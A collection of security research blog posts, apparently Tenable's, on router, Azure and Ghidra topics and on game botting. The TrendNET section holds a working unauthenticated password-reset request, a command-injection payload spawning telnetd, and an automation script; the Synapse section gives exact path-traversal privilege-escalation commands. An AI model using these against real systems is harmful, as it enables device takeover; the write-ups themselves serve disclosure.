
NETGEAR Router Network Misconfiguration

5 December 2022 at 17:16

Last Minute Patch Thwarts Pwn2Own Entries

Entering Pwn2Own is a daunting endeavor. The targets selected are often popular, already picked-over devices, and their inclusion in the event only increases the number of security researchers poring over them. On top of that, it's not uncommon for vendors to release last-minute patches for the included targets in an effort to thwart researcher findings. This year alone, both TP-Link and NETGEAR released last-minute updates to devices included in the event.

Last Minute TP-Link Patch

Unfortunately, we fell victim to this with regard to a planned submission for the NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400). The patch released by NETGEAR the day before the registration deadline dealt a deathblow to our exploit chain and invalidated our submission. A few posts on Twitter and communications with other parties appear to indicate that other contestants were also affected by this last-minute patch.

That said, since the patch is publicly available, let’s talk about what changed!

While we aren't aware of everything patched or changed in this update, we do know which flaw prevented our full exploit chain from working properly. In short, a network misconfiguration present in firmware versions prior to V1.0.9.90 inadvertently allowed unrestricted communication with any services listening via IPv6 on the WAN (internet-facing) port of the device. For example, SSH and Telnet listen on ports 22 and 23 respectively.

The SMD service hosting SSH and Telnet variants on IPv6

Prior to the patch, an attacker could interact with these services from the WAN port. After patching, however, we can see that the appropriate ip6tables rules have been applied to prevent access. Additionally, IPv6 now appears disabled by default on newly configured devices.
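For readers who want to verify their own device, a quick connectivity check against the router's WAN-side IPv6 address (run from a host outside your network) is enough to tell whether these services are still exposed. The sketch below is not taken from the advisory; the address is a placeholder and would need to be replaced with the WAN IPv6 address actually assigned to your router.

import socket

# Minimal reachability check for SSH/Telnet over IPv6.
# "2001:db8::1" is a placeholder documentation address, not a real router.
wan_v6 = "2001:db8::1"

for port in (22, 23):
    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        s.connect((wan_v6, port))
        print(f"port {port}: reachable from the WAN side")
    except OSError:
        print(f"port {port}: filtered or closed")
    finally:
        s.close()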

We’d also like to point out that — at the time of this writing — the device’s auto-update feature does not appear to recognize that updates are available beyond V1.0.6.74. Any consumers relying on the auto-update or “Check for Updates” mechanisms of these devices are likely to remain vulnerable to this issue and any other issues teased over the coming days of Pwn2Own Toronto 2022.

More details can be found on our security advisory page here. We’ll have more information regarding other discovered issues once the coordinated disclosure process for them has been concluded.



Extracting Ghidra Decompiler Output with Python

28 July 2022 at 13:03

Ghidra’s decompiler, while not perfect, is pretty darn handy. Ghidra’s user interface, however, leaves a lot to be desired. I often find myself wishing there was a way to extract all the decompiler output to be able to explore it a bit easier in a text editor or at least run other tools against it.

At the time of this writing, there is no built-in functionality to export decompiler output from Ghidra. There are a handful of community made scripts available that get the job done (such as Haruspex and ExportToX64dbg), but none of these tools are as flexible as I’d like. For one, Ghidra’s scripting interface is not the easiest to work with. And two, resorting to Java or the limitations of Jython just doesn’t cut it. Essentially, I want to be able to access Ghidra’s scripting engine and API while retaining the power and flexibility of a local, fully-featured Python3 environment.

This blog will walk you through setting up a Ghidra to Python bridge and running an example script to export Ghidra’s decompiler output.

Prepping Ghidra

First and foremost, make sure you have a working installation of Ghidra on your system. Official downloads can be obtained from https://ghidra-sre.org/.

Next, you’ll want to download and install the Ghidra to Python Bridge. Steps for setting up the bridge are demonstrated below, but it is recommended to follow the official installation guide in the event that the Ghidra Bridge project changes over time and breaks these instructions.

The Ghidra to Python bridge is a local Python RPC proxy that allows you to access Ghidra objects from outside the application. A word of caution here: using this bridge essentially allows arbitrary code execution on your machine. Be sure to shut down the bridge when not in use.

In your preferred python environment, install the ghidra bridge:

$ pip install ghidra_bridge

Create a directory on your system to store Ghidra scripts in. In this example, we’ll create and use “~/ghidra_scripts.”

$ mkdir ~/ghidra_scripts

Launch Ghidra and create a new project. Create a Code Browser window (click the dragon icon in the tool chest bar) and open the Script Manager window by selecting “Window > Script Manager.” Press the “Manage Script Directories” button in the Script Manager’s toolbar.

In the window that pops up, add and enable “$USER_HOME/ghidra_scripts” to the list of script directories.

Back in your terminal or python environment, run the Ghidra Bridge installation process.

$ python -m ghidra_bridge.install_server ~/ghidra_scripts

This will automatically copy over the scripts necessary for your system to run the Ghidra Bridge.

Finally, back in Ghidra, click the “Refresh Script List” button in the toolbar and filter the results to “bridge”. Check the boxes next to “In Toolbar” for the Server Start and Server Shutdown scripts as pictured below. This will allow you to access the bridge’s start/stop commands from the Tools menu item.

Go ahead and start the bridge by selecting “Run in Background.” If all goes according to plan, you should see monitor output in the console window at the bottom of the window similar to the following:

Using the Ghidra Bridge

Now that you’ve got the full power and flexibility of Python, let’s put it to some good use. As mentioned earlier, the example use-case being provided in this blog is the export of Ghidra’s decompiler output.

Source code for this example is available here: https://github.com/tenable/ghidra_tools/tree/main/extract_decomps
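At its core, the script just connects to the bridge and walks the open program's functions through Ghidra's DecompInterface. The snippet below is a stripped-down sketch of that idea rather than the repo's full extract.py; it assumes the bridge server is running in Ghidra and that a program is already open in the Code Browser.

import ghidra_bridge

# Creates the bridge and loads the remote Ghidra flat API into this namespace
# (currentProgram, monitor, the ghidra package, etc. come from the server side).
b = ghidra_bridge.GhidraBridge(namespace=globals())

decomp = ghidra.app.decompiler.DecompInterface()
decomp.openProgram(currentProgram)

# Dump pseudo C for every function in the currently open program.
for func in currentProgram.getFunctionManager().getFunctions(True):
    result = decomp.decompileFunction(func, 30, monitor)
    if result.decompileCompleted():
        with open(f"{func.getName()}.c", "w") as out:
            out.write(result.getDecompiledFunction().getC())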

We’ll be using an extremely simple application to demonstrate this script’s functionality, which is available in the “example” folder of the “extract_decomps” directory. All the application does is grab some input from the user and say hello.

Build and run the test application.

$ gcc test.c
$ ./a.out
What is your name?
# dino
Hello, dino!

Import the test binary into Ghidra and run an auto-analysis on it. Once complete, simply run the extraction script.

$ python extract.py
INFO:root:Program Name: a.out
INFO:root:Creation Date: Tue Jul 26 13:51:21 EDT 2022
INFO:root:Language ID: AARCH64:LE:64:AppleSilicon
INFO:root:Compiler Spec ID: default
INFO:root:Using 'a.out_extraction' as output directory…
INFO:root:Extracting decompiled functions…
INFO:root:Extracted 7 out of 7 functions
$ tree a.out_extraction
a.out_extraction
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

From here, you’re free to browse the source code in the text editor or IDE of your choice and run any other tools you see fit against this output. Please keep in mind, however, that the decompiler output from Ghidra is intended as pseudo code and won’t necessarily conform to the syntax expected by many static analysis tools.



Logging Passwords in Plaintext in Azure Arc

19 July 2022 at 13:03

Microsoft’s Azure Arc is a management platform designed to bridge multi-cloud and similarly mixed environments together in a convenient way.

Tenable Research has discovered that the Jumpstart environments for Arc do not properly use logging utilities common amongst other Azure services. This leads to potentially sensitive information, such as service principal credentials and Arc database credentials, being logged in plaintext. The log files that these credentials are stored in are accessible by any user on the system. Based on this finding, it may be possible that other services are also affected by a similar issue.

Microsoft has patched this issue and updated their documentation to warn users of credential reuse within the Jumpstart environment. Tenable’s advisory can be found here. No bounty was provided for this finding.

The Flaw

The testing environment this issue was discovered in is the ArcBox Fullbox Jumpstart environment. No additional configurations are necessary beyond the defaults.

When ArcBox-Client provisions during first-boot, it runs a PowerShell script that is sent to it via the Microsoft.Compute.CustomScriptExtension (version 1.10.12) plugin.

Most scripts we’ve come across on other services tend to write ***REDACTED*** in place of anything sensitive when writing to a log file. For example:

<PluginSettings>
  <Plugin name="Microsoft.CPlat.Core.RunCommandLinux" version="1.0.3">
    <RuntimeSettings seqNo="0">{
      "runtimeSettings": [
        {
          "handlerSettings": {
            "protectedSettingsCertThumbprint": "7AF139E055555FAKEINFO555558EC374DAD46370",
            "protectedSettings": "*** REDACTED ***",
            "publicSettings": {}
          }
        }
      ]
    }</RuntimeSettings>

In the provisioning script for this host, however, this sanitizing is not done. For example, in “C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.12\Status\0.status”, our secrets and credentials are plainly visible to everyone, including low privileged users.

This allows a malicious actor to disclose potentially sensitive information if they were to gain access to this machine. The accounts revealed could allow the attacker to further compromise a customer’s Azure environment if these credentials or accounts are re-used elsewhere.
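If you have Jumpstart-derived machines in your environment, a crude sweep of the extension status directories is enough to spot files that were written without the usual redaction. The sketch below is not from the advisory; it follows the standard Windows extension layout mentioned above, and the keyword matching is only a rough heuristic.

import glob

# Rough scan for extension status files containing unredacted secrets;
# intended to be run locally on the Windows host being checked.
for path in glob.glob(r"C:\Packages\Plugins\*\*\Status\*.status"):
    with open(path, errors="ignore") as f:
        contents = f.read()
    if "REDACTED" not in contents and any(
        needle in contents.lower() for needle in ("password", "secret", "accountkey")
    ):
        print(f"possible plaintext credentials: {path}")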

Conclusion

Obviously, the Arc Jumpstart environment is intended to be used as a demo environment, which ideally lessens the impact of the revealed credentials — provided that users haven’t reused the service principal elsewhere in their environment. That said, it isn’t uncommon for customers to use these types of Jumpstart environments as a starting point to build out their actual production infrastructure.

We do, however, feel it’s worth being aware of this issue in the event that other logging mechanisms exist elsewhere in the Azure ecosystem, which could have more dire consequences if present in a production environment.



Microsoft Azure Site Recovery DLL Hijacking

12 July 2022 at 16:58

Azure Site Recovery is a suite of tools aimed at providing disaster recovery services for cloud resources. It provides utilities for replication, data recovery, and failover services during outages.

Tenable Research has discovered that this service is vulnerable to a DLL hijacking attack due to incorrect directory permissions. This allows any low-privileged user to escalate to SYSTEM level privileges on hosts where this service is installed.

Microsoft has assigned this issue CVE-2022-33675 and rated it a severity of Important with a CVSSv3 score of 7.8. Tenable’s advisory can be found here. Microsoft’s post regarding this issue can be found here. Additionally, Microsoft is expected to award a $10,000 bug bounty for this finding.

The Flaw

The cxprocessserver service runs automatically and with SYSTEM level privileges. This is the primary service for Azure Site Recovery.

Incorrect permissions on the service’s executable directory (“E:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\transport\”) allow new files to be created by normal users. Please note that while the basic permissions show that “write” access is disabled, the “Special Permissions” still incorrectly grant write access to this directory. This can be verified by viewing the “Effective Access” granted to a given user for the directory in question, as demonstrated in the following screenshot.

This permissions snafu allows for a DLL hijacking/planting attack via several libraries used by the service binary.

Proof of Concept

For brevity, we’ve chosen to leave full exploitation steps out of this post since DLL hijacking techniques are extremely well documented elsewhere.

A malicious DLL was created to demonstrate the successful hijack via procmon.

Under normal circumstances, the loading of ktmw32.dll looks like the following:

With our planted DLL, the following can be observed:

This allows an attacker to elevate from an arbitrary, low-privileged user to SYSTEM. During the disclosure process, Microsoft confirmed this behavior and has created patches accordingly.

Conclusion

DLL hijacking is quite an antiquated technique that we don’t often come across these days. When we do, the impact is often limited because no real security boundary is crossed. MSRC lists several examples in their blog post discussing how they triage issues that make use of this technique.

In this case, however, we were able to cross a clear security boundary and demonstrated the ability to escalate a user to SYSTEM level permissions, which shows the growing trend of even dated techniques finding a new home in the cloud space due to added complexities in these sorts of environments.

As this vulnerability was discovered in an application used for disaster recovery, we are reminded that had this been discovered by malicious actors, most notably ransomware groups, the impact could have been much wider reaching. Ransomware groups have been known to target backup files and servers to ensure that a victim is forced into paying their ransom and unable to restore from clean backups. We strongly recommend applying the Microsoft supplied patches as soon as possible to ensure your existing deployments are properly secured. Microsoft has taken action to correct this issue, so any new deployments should not be affected by this flaw.



Microsoft Azure Synapse Pwnalytics

13 June 2022 at 12:42

Synapse Analytics is a platform used for machine learning, data aggregation, and other such computational work. One of the primary developer-oriented features of this platform is the use of Jupyter notebooks. These are essentially blocks of code that can be run independently of one another in order to analyze different subsets of data.

Synapse Analytics is currently listed under Microsoft’s high-impact scenarios in the Azure Bug Bounty program. Microsoft states that products and scenarios listed under that heading have the highest potential impact to customer security.

Synapse Analytics utilizes Apache Spark for the underlying provisioning of clusters that user code is run on. User code in these environments is run with intentionally limited privileges because the environments are managed by internal Microsoft subscription IDs, which is generally indicative of a multi-tenant environment.

Tenable Research has discovered a privilege escalation flaw that allows a user to escalate privileges to that of the root user within the context of a Spark VM. We have also discovered a flaw that allows a user to poison the hosts file on all nodes in their Spark pool, which allows one to redirect subsets of traffic and snoop on services users generally do not have access to. The full privilege escalation flaw has been adequately addressed. However, the hosts file poisoning flaw remains unpatched at the time of this writing.

Many of the keys, secrets, and services accessible via these attacks have traditionally allowed further lateral movement and potential compromise of Microsoft-owned infrastructure, which could lead to a compromise of other customers’ data as we’ve seen in several other cases recently, such as Wiz’s ChaosDB or Orca’s AutoWarp. For Synapse Analytics, however, access by a root user is limited to their own Spark pool. Access to resources outside of this pool would require additional vulnerabilities to be chained and exploited. While Tenable remains skeptical of the claim that cross-tenant access is impossible with the elevated level of access gained by exploiting these flaws, the Synapse engineering team has assured us that it is not.

Tenable has rated this issue as Critical severity based on the context of the Spark VM itself. Microsoft considers this issue a Low severity defense-in-depth improvement based on the context of the Synapse Analytics environment as a whole. Microsoft states that cross-tenant impact of this issue is unlikely, if not impossible, based on this vulnerability alone.

We’ll get to the technical bits soon, but let’s first address some disclosure woes. When it comes to Synapse Analytics, Microsoft Security Response Center (MSRC) and the development team behind Synapse seem to have a major communications disconnect. It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via email and the researcher portal, it wasn’t until we reached out via Twitter that we received responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently, and no notification was provided to Tenable. We had to discover this information for ourselves.

During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. Their team stated the following (typos are Microsoft’s): “[W]e do not consider this to be a important severity security issue but rather a better practice.” If that were the case, why can snippets like the following be found throughout the Spark VMs?

It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occurring.

Unfortunately, communication errors and the downplaying of security issues in their products and cloud offerings are far from uncommon behavior for MSRC as of late. For a few more recent examples where MSRC has failed to adequately triage findings and has acted in bad faith towards researchers, check out the following research articles:

The Flaws

Privilege Escalation

The Jupyter notebook functionality of Synapse runs as a user called “trusted-service-user” within an Apache Spark cluster. These compute resources are provisioned to a specific Azure tenant, but are managed internally by Microsoft. This can be verified by viewing the subscription ID of the nodes on the cluster (only visible with elevated privileges and the Azure metadata service). This is indicative of a multi-tenant environment.

Not our subscription ID

This “trusted-service-user” has limited access to many of the resources on the host and is intentionally unable to interact with “waagent,” the Azure metadata service, the Azure WireServer service, and many other services only intended to be accessed by the root user and other special accounts end-users do not normally have access to.

That said, the trusted-service-user does have sudo access to a utility that is used to mount file shares from other Azure services:

The above screenshot shows that the Jupyter notebook code is running as the “trusted-service-user” account and that it has sudo access to run a particular script without requiring a password.

The filesharemount.sh script happens to contain a handful of flaws that, when combined, can be used to escalate privileges to root. The full text has been omitted from this section for brevity, but relevant bits are highlighted below.

#!/bin/bash
#
# NodeAgent installation script.
#
# Maintained by [email protected].
# Copyright © Microsoft Corporation. All rights reserved.
#
# this script use cifs to mount fileshare, will be deprecated once we implement fuse driver to mount fileshare
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
source ${SCRIPT_DIR}/functions.sh
...

First and foremost, this script is clearly temporary and has likely not undergone strict review as indicated by the deprecation warning. Additionally, it appears that several functions are sourced from a “functions.sh” file in the same directory.

The functions provided by “functions.sh” are used for sanity checks throughout the main script. For example, the following is used to determine if a given mount point is valid before attempting to unmount it:

...
if [ "$commandtype" = "unmount" ]; then
    check_if_is_valid_mount_point_before_unmount $args
    umount $args
    rm -rf $args
    exit 0
fi
...

Moving on, the end of the main script is where we find the good stuff:

...
chown -R ${TRUSTED_SERVICE_USER}:${TRUSTED_SERVICE_USER} "$mountPoint"
uid=$(id -u ${TRUSTED_SERVICE_USER})
gid=$(id -g ${TRUSTED_SERVICE_USER})
mount -t cifs //"$account".file.core.windows.net/"$fileshare" "$mountPoint" -o vers=3.0,uid=$uid,gid=$gid,username="$account",password="$accountKey",serverino
if [ "$?" -ne "0" ]; then
    check_if_deletable_folder "$mountPoint"
    rm -rf "$mountPoint"
    exit 1
fi

Another of the check functions from functions.sh is used above, but this time the check is keyed off successfully running the mount command a few lines earlier. If the mount command fails, the mount point is deleted. By providing a mount point that passes all sanity checks to this point and that has invalid file share credentials, we can trigger the “rm” command in the above snippet. Let’s use it to get rid of the functions.sh file, and thus, all of the sanity check functions.

Full command used for file deletion:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/functions.sh source:https://[email protected] accountKey:invalid 2>&1

The functions.sh file only checks that the mountPoint begins with “/synfs” before determining that it is valid. This allows a simple directory traversal attack to bypass that function.
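To illustrate why that prefix check is worthless on its own, the few lines below (a Python illustration, not the actual functions.sh logic) show a traversal path sailing past a startswith-style check while resolving to a completely different location:

import os

mount_point = "/synfs/../../../usr/lib/notebookutils/bin/functions.sh"
print(mount_point.startswith("/synfs"))  # True -- the sanity check passes
print(os.path.normpath(mount_point))     # /usr/lib/notebookutils/bin/functions.sh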

Now we can bypass all checks from functions.sh, remove the existing filesharemount.sh utility, and mount our own in the same directory, which still has sudo access. We created a test share using the Gen2 Storage service within Azure. We created a file in this share called “filesharemount.sh” with the contents being “id”. This allows us to demonstrate the execution privileges now granted to us.

Our mount command looks like this:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/ source:https://[email protected] accountKey:REDACTED 2>&1

Let’s check our access now:

Hosts File Poisoning

There exists a service on one of the hosts in each Spark pool called “HostResolver.” To be specific, it can be found at “/opt/microsoft/Microsoft.Analytics.Clusters.Services.HostResolver.dll” on each of the nodes in the Synapse environment. This service is used to manage the “hosts” file for all hosts in the Spark cluster. This supports ease-of-management — administrators can send commands to each host by a preset hostname, rather than keeping track of IP addresses, which can change based on the scaling features of the pool.

Due to the lack of any authentication features, a low-privileged user is able to overwrite the “hosts” file on all nodes in their Spark pool, which allows them to snoop on services and traffic they otherwise are not intended to be able to see. To be clear, this isn’t any sort of game-changing vulnerability or of any real significance on its own. We do believe, however, that this flaw warrants a patch due to its potential as a critical piece of a greater exploit chain. It’s also just kinda fun and interesting.

For example, here’s a view of the information used by each host:

Output:

The hostresolver can be queried like this:

What happens when a new host is added to the pool? Well, a register request is sent to the hostresolver, which parses the request, and then sends out an update to all other hosts in the pool to update their hosts file. If the entry already exists, it is overwritten.

This register request looks like this:

The updated hosts file looks like this:

This change is propagated to all hosts in the pool. As there is no authentication to this service, we can arbitrarily modify the hosts file on all nodes by manually submitting register requests. If these hosts were provisioned under our subscription ID in Azure, this wouldn’t be an issue since we’d already have full control of them. Since we don’t actually own these hosts, however, this is a slightly bigger problem.

When we originally reported this issue, communicating to hosts outside of one’s own Spark pool was possible. We assume that was a separate issue as it was fixed during the course of our own research and not publicly disclosed by Microsoft. This new inability to communicate outside of our own pool severely limits the impact of this flaw by itself, now requiring other flaws in order to achieve greater impact. At the time of this writing, the hosts file poisoning flaw remains unpatched.

Key Takeaways

Patching in cloud environments is largely out of end-users’ control. Customers are entirely beholden to the cloud providers to fix reported issues. The good news is that once an issue is fixed, it’s fixed. Customers generally don’t have any actions to take since everything happens behind the scenes.

The bad news, however, is that the cloud providers rarely provide notice that a security-related flaw was ever present in the first place. Cloud vulnerabilities rarely receive CVEs because they aren’t static products. They are ever-changing beasts with no accountability requirements in terms of notifying users and customers of security-related changes.

It doesn’t matter how good any given vendor’s software supply chain is if there are parts of the process or product that don’t rely on it. For example, the filesharemount.sh script (and other scripts discovered on these hosts) have very clear deprecation warnings in them and don’t appear to be required to go through the normal QA channels. Chances are this was a temporary script to enable necessary functionality with the intention of replacing it sometime down the line, but that sometime never arrived and it became a fairly critical component, which is a situation any software engineer is all too familiar with.

Additionally, because these environments are so volatile, it makes it difficult for security researchers to accurately gauge the impact of their findings because of strict Rules of Engagement and changes happening over the course of one’s research.

For example, in the hosts file poisoning vulnerability discussed in this blog, we noticed that we were able to change the hosts files in pools outside of our own, but this was fixed at some point during the disclosure process by introducing more robust firewalling rules at the node-level. We also noticed many changes happening with certain features of the service throughout our research, which we now know was the doing of the good folks at Orca Security during their SynLapse research.

On a final note, while we respect the efforts of researchers that go the extra mile to compromise customer data and internal vendor secrets, we believe it’s in everyone’s best interest to adhere to the rules set forth by each of the cloud vendors. Since there are so many moving pieces in these environments and likely many configurations outsiders are not privy to, violating these rules of engagement could have unintended consequences we’d rather not be responsible for. This does, however, introduce a sort of Catch-22 for researchers where the vendor can claim that a disclosure report does not adequately demonstrate impact, but also claim that a researcher has violated the rules of engagement if they do take the extra steps to do so.

For more information regarding these issues and their disclosure timelines, please see the following Tenable Research Advisories:



TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore, only a subset of the issues disclosed in TRA-2021-54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.
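As a rough idea of what that automation might look like, the sketch below scripts the first link in the chain (the hidden admin command shown earlier) using Python's requests library. The target address is a placeholder, and the remaining steps (the syslog corruption request and the reboot) would follow the same pattern.

import requests

# Step 1 of the chain: reset the admin password via the hidden
# tools_admin_elecom action. "[2001:db8::1]" is a placeholder for the
# device's WAN IPv6 address.
target = "http://[2001:db8::1]"
data = {
    "ccp_act": "set",
    "action": "tools_admin_elecom",
    "html_response_page": "dummy_value",
    "html_response_return_page": "dummy_value",
    "method": "tools",
    "admin_password": "testing123",
}
resp = requests.post(f"{target}/apply_sec.cgi", data=data, timeout=10)
print(resp.status_code)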



New World’s Botting Problem

11 November 2021 at 14:02
Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massively multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect tools that monitor the game’s screen or take automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a never-ending game of cat and mouse. That said, there are ways to make this approach much safer, such as running the screen watcher on a totally different computer. Windows Remote Desktop, Team Viewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely, so what’s to stop a bot from monitoring the screen the same way? Nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but doing so takes much more effort and is more prone to false positives, which works against the interest of a game studio that doesn’t want to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

